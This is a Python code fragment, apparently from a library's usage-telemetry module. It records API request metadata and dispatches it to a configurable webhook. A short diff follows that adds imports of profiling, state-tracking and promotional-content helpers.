def track_api_request(endpoint, source, method, status_code, execution_time, request_size=0, response_size=0):
    """Record one API request through the shared conduit."""
    conduit.add_api_request({
        'endpoint': endpoint,
        'source': source,
        'method': method,
        'status_code': status_code,
        'execution_time': execution_time,
        'timestamp': datetime.now().isoformat(),
        'request_size': request_size,
        'response_size': response_size,
    })


def configure(webhook_url):
    """Point the shared conduit at *webhook_url*."""
    return conduit.configure(webhook_url)


def sync_now():
    """Force an immediate dispatch of buffered data."""
    return conduit.dispatch('manual')


def retry_failed():
    """Retry payloads that previously failed to send."""
    return conduit.retry_failed()
@@ -0,0 +1,4 @@
1
+ from vnai.scope.profile import inspector
2
+ from vnai.scope.state import tracker,record
3
+ from vnai.scope.promo import manager as content_manager
4
+ from vnai.scope.promo import present as present_content